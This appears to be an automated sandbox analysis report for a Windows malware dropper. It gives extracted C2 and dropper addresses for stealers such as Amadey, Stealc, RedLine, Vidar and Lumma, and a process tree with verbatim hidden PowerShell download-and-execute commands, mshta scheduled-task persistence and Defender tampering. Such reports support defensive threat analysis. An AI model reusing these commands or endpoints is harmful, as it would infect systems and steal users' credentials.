Resubmissions

20-02-2025 13:52

250220-q6q6nswkht 10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-02-2025 13:52

General

  • Target

    b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe

  • Size

    5.5MB

  • MD5

    964ba389f37bb877cc31a8c8ff6918bc

  • SHA1

    783a05c3876487d7b1e3785bc730f976b0a86cab

  • SHA256

    b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13

  • SHA512

    bd2e09cc34bcc96dd81822b82bf4fb4973db6348b4f9929123e26102716543176f8d88870716d55c449988ac00958f85eaaf524572e949cbfc302248a459c4c5

  • SSDEEP

    98304:7ZtVcygxD+UeVpiMjSTG/vJYivqEGzHrNxaTN00X/6KWouxIFtcFGR7AbwEtt:rS/+xpHSy/BYDEGbrNxaTNNKxIuGRqt

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

lumma

C2

https://penetratebatt.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 20 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 29 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 40 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 58 IoCs
  • Identifies Wine through registry keys 2 TTPs 20 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 17 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 38 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe
    "C:\Users\Admin\AppData\Local\Temp\b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2V63.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2V63.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3040
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q39x7.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q39x7.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3940
          • C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe
            "C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1396
            • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
              "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              PID:1728
              • C:\Windows\SysWOW64\schtasks.exe
                "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 13:54 /du 23:59 /sc daily /ri 1 /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1588
          • C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe
            "C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2332
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"
              6⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:3704
          • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
            "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:348
          • C:\Users\Admin\AppData\Local\Temp\1089179101\647e3a57ba.exe
            "C:\Users\Admin\AppData\Local\Temp\1089179101\647e3a57ba.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3772
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn 2Aq6smakEho /tr "mshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1192
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn 2Aq6smakEho /tr "mshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1088
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3244
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:412
                • C:\Users\Admin\AppData\Local\TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE
                  "C:\Users\Admin\AppData\Local\TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE"
                  8⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2056
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4808
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • Delays execution with timeout.exe
                PID:4972
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4336
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4576
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1564
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4896
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2260
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "gobf2malhcj" /tr "mshta \"C:\Temp\xyREVjwiD.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:320
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\xyREVjwiD.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:1192
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2808
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3728
          • C:\Users\Admin\AppData\Local\Temp\1089264001\5afb3f6749.exe
            "C:\Users\Admin\AppData\Local\Temp\1089264001\5afb3f6749.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4976
          • C:\Users\Admin\AppData\Local\Temp\1089265001\fe90177534.exe
            "C:\Users\Admin\AppData\Local\Temp\1089265001\fe90177534.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:728
          • C:\Users\Admin\AppData\Local\Temp\1089266001\5eb81d9b73.exe
            "C:\Users\Admin\AppData\Local\Temp\1089266001\5eb81d9b73.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1576
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:6928
          • C:\Users\Admin\AppData\Local\Temp\1089267001\791fd74b89.exe
            "C:\Users\Admin\AppData\Local\Temp\1089267001\791fd74b89.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1232
          • C:\Users\Admin\AppData\Local\Temp\1089268001\55c38d1b84.exe
            "C:\Users\Admin\AppData\Local\Temp\1089268001\55c38d1b84.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5088
          • C:\Users\Admin\AppData\Local\Temp\1089269001\32d10d4cf6.exe
            "C:\Users\Admin\AppData\Local\Temp\1089269001\32d10d4cf6.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3296
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:1692
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:1380
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3852
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3744
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • Kills process with taskkill
              PID:348
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:3140
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:5028
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {365027fc-e4be-407f-88e0-866d1cee1669} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" gpu
                    8⤵
                      PID:2920
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e98b978-2d4d-4298-bacc-8faadec7ec2d} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" socket
                      8⤵
                        PID:4920
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3128 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0af634cb-2018-406b-a4b0-20b38e04d95c} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab
                        8⤵
                          PID:1704
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6252e3bc-8b0b-4e7b-a192-b0347feb5d24} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab
                          8⤵
                            PID:2652
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4616 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4520 -prefMapHandle 4488 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7394237c-3e27-4de6-9bf6-51cf05ef0fe7} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" utility
                            8⤵
                            • Checks processor information in registry
                            PID:7056
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 3 -isForBrowser -prefsHandle 4808 -prefMapHandle 5372 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3f2147-062c-492f-b84c-eede652b8180} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab
                            8⤵
                              PID:5644
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57d09812-8a28-467b-a1de-a7faa42a8d44} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab
                              8⤵
                                PID:5704
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 5 -isForBrowser -prefsHandle 5808 -prefMapHandle 5804 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e0405cd-0497-4b04-8e16-88653268e09b} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab
                                8⤵
                                  PID:5692
                          • C:\Users\Admin\AppData\Local\Temp\1089270001\1a1d30316b.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089270001\1a1d30316b.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:4104
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c schtasks /create /tn LLtZ5maYhpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta" /sc minute /mo 25 /ru "Admin" /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2328
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /tn LLtZ5maYhpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta" /sc minute /mo 25 /ru "Admin" /f
                                7⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:2260
                            • C:\Windows\SysWOW64\mshta.exe
                              mshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta
                              6⤵
                              • Checks computer location settings
                              • System Location Discovery: System Language Discovery
                              PID:1660
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'V5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                7⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Downloads MZ/PE file
                                • System Location Discovery: System Language Discovery
                                PID:892
                                • C:\Users\Admin\AppData\Local\TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE
                                  "C:\Users\Admin\AppData\Local\TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE"
                                  8⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:6284
                          • C:\Users\Admin\AppData\Local\Temp\1089271001\bf14320d81.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089271001\bf14320d81.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:6732
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:5440
                          • C:\Users\Admin\AppData\Local\Temp\1089272001\2ee2d4784c.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089272001\2ee2d4784c.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:7000
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:6892
                          • C:\Users\Admin\AppData\Local\Temp\1089273001\e8172d6c5e.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089273001\e8172d6c5e.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:5640
                          • C:\Users\Admin\AppData\Local\Temp\1089274001\c52951429a.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089274001\c52951429a.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            PID:6600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 1592
                              6⤵
                              • Program crash
                              PID:6288
                          • C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
                            "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:6252
